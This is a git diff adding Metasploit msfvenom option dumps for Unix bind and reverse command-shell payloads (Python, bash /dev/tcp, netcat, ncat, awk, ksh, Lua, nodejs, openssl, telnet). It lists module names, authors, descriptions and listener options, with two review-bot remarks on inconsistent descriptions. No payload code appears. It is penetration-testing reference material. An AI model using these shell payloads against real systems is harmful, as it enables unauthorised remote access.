@@ -0,0 +1,34 @@ + + Name: Python Exec, Command Shell, Bind TCP (via python) + Module: payload/cmd/unix/python/shell_bind_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 513 + Rank: Normal + +Provided by: + Spencer McIntyre + mumbai + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-shell_reverse_sctp.txt b/msfvenom/payload_options/cmd-unix-python-shell_reverse_sctp.txt new file mode 100644 index 0000000..770f275 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-shell_reverse_sctp.txt 
@@ -0,0 +1,41 @@ + + Name: Python Exec, Command Shell, Reverse SCTP (via python) + Module: payload/cmd/unix/python/shell_reverse_sctp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 550 + Rank: Normal + +Provided by: + Spencer McIntyre + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
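Review bot: in this shell_reverse_sctp hunk the ReverseAllowProxy description still reads "Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST" although the transport is SCTP. The identical text appears verbatim in every reverse TCP hunk in this batch, so it is shared option metadata rather than anything SCTP-specific, but a reader of this file has no way to tell whether the option is honoured by the SCTP handler. Either reword the option description upstream so it does not name TCP, or have the generator flag inherited option text, so the dump does not look like it was copied from the wrong payload.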
diff --git a/msfvenom/payload_options/cmd-unix-python-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-unix-python-shell_reverse_tcp.txt new file mode 100644 index 0000000..514cff0 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-shell_reverse_tcp.txt 
@@ -0,0 +1,41 @@ + + Name: Python Exec, Command Shell, Reverse TCP (via python) + Module: payload/cmd/unix/python/shell_reverse_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 493 + Rank: Normal + +Provided by: + Spencer McIntyre + Ben Campbell + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-unix-python-shell_reverse_tcp_ssl.txt b/msfvenom/payload_options/cmd-unix-python-shell_reverse_tcp_ssl.txt new file mode 100644 index 0000000..cf700ea --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-shell_reverse_tcp_ssl.txt 
@@ -0,0 +1,43 @@ + + Name: Python Exec, Command Shell, Reverse TCP SSL (via python) + Module: payload/cmd/unix/python/shell_reverse_tcp_ssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 518 + Rank: Normal + +Provided by: + Spencer McIntyre + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-shell_reverse_udp.txt b/msfvenom/payload_options/cmd-unix-python-shell_reverse_udp.txt new file mode 100644 index 0000000..e9b2fdc --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-shell_reverse_udp.txt 
@@ -0,0 +1,40 @@ + + Name: Python Exec, Command Shell, Reverse UDP (via python) + Module: payload/cmd/unix/python/shell_reverse_udp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 489 + Rank: Normal + +Provided by: + Spencer McIntyre + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse.txt b/msfvenom/payload_options/cmd-unix-reverse.txt new file mode 100644 index 0000000..350e5aa --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse.txt 
@@ -0,0 +1,36 @@ + + Name: Unix Command Shell, Double Reverse TCP (telnet) + Module: payload/cmd/unix/reverse + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 100 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell through two inbound connections + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ShellPath sh yes The path to the shell to execute + TelnetPath telnet yes The path to the telnet executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_awk.txt b/msfvenom/payload_options/cmd-unix-reverse_awk.txt new file mode 100644 index 0000000..34f00c4 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_awk.txt 
@@ -0,0 +1,40 @@ + + Name: Unix Command Shell, Reverse TCP (via AWK) + Module: payload/cmd/unix/reverse_awk + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 139 + Rank: Normal + +Provided by: + espreto + Ulisses Castro + Gabriel Quadros + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via GNU AWK + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_bash.txt b/msfvenom/payload_options/cmd-unix-reverse_bash.txt new file mode 100644 index 0000000..5a96d3b --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_bash.txt 
@@ -0,0 +1,44 @@ + + Name: Unix Command Shell, Reverse TCP (/dev/tcp) + Module: payload/cmd/unix/reverse_bash + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 59 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via bash's builtin /dev/tcp. + + This will not work on circa 2009 and older Debian-based Linux + distributions (including Ubuntu) because they compile bash + without the /dev/tcp feature. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + BashPath bash yes The path to the Bash executable + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + ShellPath sh yes The path to the shell to execute + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-unix-reverse_bash_telnet_ssl.txt b/msfvenom/payload_options/cmd-unix-reverse_bash_telnet_ssl.txt new file mode 100644 index 0000000..fb2fddd --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_bash_telnet_ssl.txt 
@@ -0,0 +1,44 @@ + + Name: Unix Command Shell, Reverse TCP SSL (telnet) + Module: payload/cmd/unix/reverse_bash_telnet_ssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via mkfifo and telnet. + This method works on Debian and other systems compiled + without /dev/tcp support. This module uses the '-z' + option included on some systems to encrypt using SSL. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + TelnetPath telnet yes The path to the telnet executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_bash_udp.txt b/msfvenom/payload_options/cmd-unix-reverse_bash_udp.txt new file mode 100644 index 0000000..3a2321a --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_bash_udp.txt 
@@ -0,0 +1,44 @@ + + Name: Unix Command Shell, Reverse UDP (/dev/udp) + Module: payload/cmd/unix/reverse_bash_udp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 68 + Rank: Normal + +Provided by: + hdm + bcoles + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via bash's builtin /dev/udp. + + This will not work on circa 2009 and older Debian-based Linux + distributions (including Ubuntu) because they compile bash + without the /dev/udp feature. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + BashPath bash yes The path to the Bash executable + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + ShellPath sh yes The path to the shell to execute + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_jjs.txt b/msfvenom/payload_options/cmd-unix-reverse_jjs.txt new file mode 100644 index 0000000..60ac5ab --- /dev/null 
+++ b/msfvenom/payload_options/cmd-unix-reverse_jjs.txt @@ -0,0 +1,41 @@ + + Name: Unix Command Shell, Reverse TCP (via jjs) + Module: payload/cmd/unix/reverse_jjs + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 843 + Rank: Normal + +Provided by: + conerpirate + bcoles + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute + +Description: + Connect back and create a command shell via jjs + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + JJSPath jjs yes The path to the JJS executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_ksh.txt b/msfvenom/payload_options/cmd-unix-reverse_ksh.txt new file mode 100644 index 0000000..33ec651 
--- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_ksh.txt @@ -0,0 +1,40 @@ + + Name: Unix Command Shell, Reverse TCP (via Ksh) + Module: payload/cmd/unix/reverse_ksh + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 37 + Rank: Normal + +Provided by: + Wang Yihang + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back and create a command shell via Ksh. Note: Although Ksh is often + available, please be aware it isn't usually installed by default. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + KSHPath ksh yes The path to the KSH executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
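Review bot: the Description in this reverse_ksh hunk argues against itself: "Although Ksh is often available, please be aware it isn't usually installed by default." Either it is commonly present or it is not; as written the sentence gives the reader nothing to act on. The file mirrors the module's own metadata, so the fix belongs upstream (something along the lines of "ksh is not installed by default on most systems; confirm it exists on the target before using this payload"), but flag it here so nobody treats this option dump as vetted guidance.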
diff --git a/msfvenom/payload_options/cmd-unix-reverse_lua.txt b/msfvenom/payload_options/cmd-unix-reverse_lua.txt new file mode 100644 index 0000000..c9e16f6 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_lua.txt @@ -0,0 +1,39 @@ + + Name: Unix Command Shell, Reverse TCP (via Lua) + Module: payload/cmd/unix/reverse_lua + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 209 + Rank: Normal + +Provided by: + xistence + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via Lua + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + LuaPath lua yes The path to the Lua executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-unix-reverse_ncat_ssl.txt b/msfvenom/payload_options/cmd-unix-reverse_ncat_ssl.txt new file mode 100644 index 0000000..a1003db --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_ncat_ssl.txt 
@@ -0,0 +1,42 @@ + + Name: Unix Command Shell, Reverse TCP (via ncat) + Module: payload/cmd/unix/reverse_ncat_ssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 27 + Rank: Normal + +Provided by: + C_Sto + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via ncat, utilizing ssl mode + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + NcatPath ncat yes The path to the NCat executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + ShellPath /bin/sh yes The path to the shell to execute + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_netcat.txt b/msfvenom/payload_options/cmd-unix-reverse_netcat.txt new file mode 100644 index 0000000..9e6b12a --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_netcat.txt 
@@ -0,0 +1,42 @@ + + Name: Unix Command Shell, Reverse TCP (via netcat) + Module: payload/cmd/unix/reverse_netcat + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 90 + Rank: Normal + +Provided by: + m-1-k-3 + egypt + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via netcat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + NetcatPath nc yes The path to the Netcat executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + ShellPath /bin/sh yes The path to the shell to execute + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_netcat_gaping.txt b/msfvenom/payload_options/cmd-unix-reverse_netcat_gaping.txt new file mode 100644 index 0000000..2255d37 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-unix-reverse_netcat_gaping.txt @@ -0,0 +1,40 @@ + + Name: Unix Command Shell, Reverse TCP (via netcat -e) + Module: payload/cmd/unix/reverse_netcat_gaping + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 19 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via netcat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + NetcatPath nc yes The path to the Netcat executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + ShellPath /bin/sh yes The path to the shell to execute + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-unix-reverse_nodejs.txt b/msfvenom/payload_options/cmd-unix-reverse_nodejs.txt new file mode 100644 index 0000000..3cde583 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_nodejs.txt @@ -0,0 +1,38 @@ + + Name: Unix Command Shell, Reverse TCP (via nodejs) + Module: payload/cmd/unix/reverse_nodejs + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 3171 + Rank: Normal + +Provided by: + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Continually listen for a connection and spawn a command shell via nodejs + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-unix-reverse_openssl.txt b/msfvenom/payload_options/cmd-unix-reverse_openssl.txt new file mode 100644 index 0000000..8a34aff --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_openssl.txt 
@@ -0,0 +1,39 @@ + + Name: Unix Command Shell, Double Reverse TCP SSL (openssl) + Module: payload/cmd/unix/reverse_openssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 152 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell through two inbound connections + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + OpenSSLPath openssl yes The path to the OpenSSL executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + ShellPath sh yes The path to the shell to execute + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_perl.txt b/msfvenom/payload_options/cmd-unix-reverse_perl.txt new file mode 100644 index 0000000..f2fee82 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_perl.txt 
